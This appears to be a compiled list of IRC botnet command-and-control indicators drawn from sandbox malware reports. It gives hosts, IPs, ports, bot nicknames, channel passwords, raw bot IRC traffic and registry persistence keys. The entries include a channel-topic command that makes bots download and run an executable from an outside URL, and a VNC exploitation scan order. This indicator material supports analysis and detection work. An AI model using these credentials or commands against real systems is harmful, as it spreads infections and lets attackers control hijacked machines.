drego85.dyndns.org/drego85.ns0.it/drego85.no-ip.net


Host Name IP Address
dell-d3e62f7e26 10.1.12.2
drego85.dyndns.org 67.220.65.39

* C&C Server: 67.220.65.39:6667
* Server Password:
* Username: XP-2174
* Nickname: [00|DEU|707227]
* Channel: #imbot (Password: config)
* Channeltopic: :.dl http://ownedrox.altervista.org/imbotv4.exe c:\startme32.exe 1

net.anddos.co.uk (anddos dci bot lol)


* Requested Host: net.anddos.co.uk
* Resulting Address: 94.23.153.223
* IRC Data
  o User Name: zgtlat
  o Host Name: “”
  o Server Name:
  o Real Name: zgtlat
  o Password: dickybob
  o Nick Name: ncrrpk
  o Non RFC Conform: 1
    + Channel
      # Name: #ohai3
      # Password: trb123trb
    + Notice Message Deleted
      # Value: :irc.goonet.net NOTICE AUTH :*** ...

sip4.voipkosovasite.com


DNS Lookup
Host Name IP Address
0 127.0.0.1
shitit.net shitit.net 75.126.252.200

UDP Connections
Remote IP Address: 127.0.0.1 Port: 1045
Send Datagram: 53 packet(s) of size 1
Recv Datagram: 53 packet(s) of size 1

Download URLs
http://75.126.252.200/fly3.jpg (shitit.net)
Outgoing connection to remote server: shitit.net TCP port 80

DNS Lookup
Host Name IP Address
dell-d3e62f7e26 10.1.10.2
sip4.voipkosovasite.com 82.114.87.46

* C&C Server: 82.114.87.46:1868
* Server Password:
* Username: XP-9971
* Nickname: [00|DEU|994663]
...

213.239.201.80 (ruski bots)


Remote Host Port Number
213.239.201.80 8000
213.239.201.80 80

* The data identified by the following URL was then requested from the remote web server:
  o http://nero872.cn/a/

Registry Modifications

* The following Registry Keys were created:
  o HKEY_CURRENT_USER\Software\Minisoft
  o HKEY_CURRENT_USER\Software\Videohost
  o HKEY_CURRENT_USER\Software\XML
* The following Registry Keys were deleted:
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\AppMgmt
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Base
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Boot Bus...

Buchananas21.Coupe.Mx [riesgo.]


Remote Host Port Number
66.90.110.138 7070

MODE [CPF|USA|00|P|20484] -ix
JOIN #FUD f1f4fud
PRIVMSG #FUD :[IM]: Thread Activated: Sending Message.
PONG Buchananas21.Coupe.Mx
NICK [CPF|USA|00|P|20484]
USER XP-9366 * 0 :COMPUTERNAME
PASS couperlz

Other details

* The following port was open in the system:

Port Protocol Process
1053 TCP baeksyesrn.exe (%Windir%\baeksyesrn.exe)

Registry Modifications

* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Windows Sec...

olivares2006.noip.es


85.214.114.224:6668
Nick: AUT[XP]1627252
Username: phuznpv
Joined Channel: ##tomillar
Channel Topic for Channel ##tomillar: “.asc vnc 75 0 0 -r -b “
Private Message to Channel ##tomillar: “[REALMBOT] Random Exploitation started on 192.168.x.x:5900 waiting 5 seconds for 0 minutes using 75 threads.”

java1.webhop.net


java1.webhop.net 89.148.0.52
java2.webhop.net

Outgoing connection to remote server: java1.webhop.net TCP port 443
Outgoing connection to remote server: java1.webhop.net TCP port 443

Registry Changes by all processes

Create or Open

Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{54AF1E87-2769-558F-34E9-EC1E2A442DD1} “StubPath” = C:\WINDOWS\system32\widll.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “widll” = C:\WINDOWS\system32\widll.exe

Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Advanced INF Setup “AdvpackLogFile”
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\HTTP\shell\open\command “”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{54AF1E87-2769-558F-34E9-EC1E2A442DD1} “StubPath”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “widll”

File Changes by all processes

New Files
C:\WINDOWS\system32\widll.exe
\Device\RasAcd

Opened Files
C:\rxvterm
c:\PIUD.EXE
C:\WINDOWS\system32\widll.exe

Deleted...

shoock.dyndns.ws


189.19.68.201:6667
Nick: AUT|m0d4|732363
Username: zqtihakz
Server Pass: anal
Joined Channel: ##AnaL## with Password a

irc.lulz.ee


Remote Host Port Number
64.89.27.36 51987

NICK pLagUe{USA}72995
MODE pLagUe{USA}72995 -ix
JOIN #trees
PONG irc.lulz.ee
USER SkuZ * okTeaM UniX b0at 0.4
PRIVMSG #trees :New PC Infected.

Other details

* The following port was open in the system:

Port Protocol Process
1052 TCP raidhost.exe (%Windir%\raidhost.exe)

Registry Modifications

* The newly created Registry Value is:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + raidhost = “raidhost.exe”

so that...

irc.ourdomain.bleh


69.147.233.136:6667

NICK n-611470
USER vupyrjg 0 0 :n-611470
USERHOST n-611470
MODE n-611470 -x+B
JOIN #AlexBot
NOTICE n-611470 :.VERSION mIRC v6.12 Khaled Mardam-Bey.
PRIVMSG #AlexBot :[MAIN]: Status: Ready. Bot Uptime: 0d 0h 0m.
PRIVMSG #AlexBot :[MAIN]: Bot ID: AlexBot.
PRIVMSG #AlexBot :[Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 0h 0m.
PRIVMSG...